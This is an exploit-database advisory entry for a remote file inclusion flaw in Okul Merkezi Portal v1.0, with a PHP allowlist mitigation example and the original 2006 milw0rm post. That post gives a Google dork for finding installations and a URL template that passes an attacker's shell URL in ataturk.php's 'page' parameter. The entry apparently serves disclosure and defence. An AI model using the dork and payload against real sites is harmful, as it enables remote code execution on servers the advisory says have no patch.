Vendor: Portal
By: ShaFuck31
CVSS: 7.5 (HIGH)
Vulnerability: Remote File Inclusion
CWE: 98
Product Name: Portal
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Okul Merkezi Portal v1.0

A remote file inclusion vulnerability exists in Okul Merkezi Portal v1.0. By sending a crafted HTTP request that supplies a URL in the 'page' parameter of the 'ataturk.php' script, an attacker can execute arbitrary code on the vulnerable system.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application.
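
One way to apply this validation to the 'page' parameter is an allowlist that maps request values to fixed local files. This is an added example, not Okul Merkezi Portal code: it assumes ataturk.php chooses a file to include from 'page', and the page names, the pages directory and the resolve_page() helper are hypothetical.

```php
<?php
// Added illustration, not the portal's own code. Assumption: ataturk.php
// selects the file it includes from the 'page' request parameter.

// Hypothetical layout: every includable page lives under PAGE_DIR.
const PAGE_DIR = __DIR__ . '/pages';

// Hypothetical allowlist: request value => fixed file name under PAGE_DIR.
const ALLOWED_PAGES = [
    'biyografi' => 'biyografi.php',
    'ilkeler'   => 'ilkeler.php',
    'galeri'    => 'galeri.php',
];

// Returns the absolute path to include, or null if the request is rejected.
function resolve_page($requested): ?string
{
    // Arrays (?page[]=x) and other non-string values are rejected outright.
    if (!is_string($requested)) {
        return null;
    }
    // Exact key lookup: URLs, stream wrappers, traversal sequences and
    // NUL bytes can never match a key, so they never reach include.
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    // Defence in depth: the resolved file must exist and sit inside PAGE_DIR.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . ALLOWED_PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$target = resolve_page($_GET['page'] ?? null);
if ($target === null) {
    http_response_code(404);
    exit('Page not found');
}
include $target; // only a path taken from the allowlist is ever included
```

Independently of the code, keeping PHP's `allow_url_include` directive set to Off prevents include from fetching remote URLs at all.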

Exploit-DB raw data:

# LiderHack.Org & BhhGroup.Org & Bilgi-Yonetimi.Org.Tr

# script name : Okul Merkezi Portal v1.0

# GoogLe Dork : ogrencimezunlar.php

# Script Download : http://www.okulmerkezi.com/omdemo/

# Risk : High

# Found By : ShaFuck31

# Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |

# Vulnerable file : ataturk.php

#Vuln :
http://www.victim.com/ScriptPath/ataturk.php?page=[sheLL]

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM

# milw0rm.com [2006-12-25]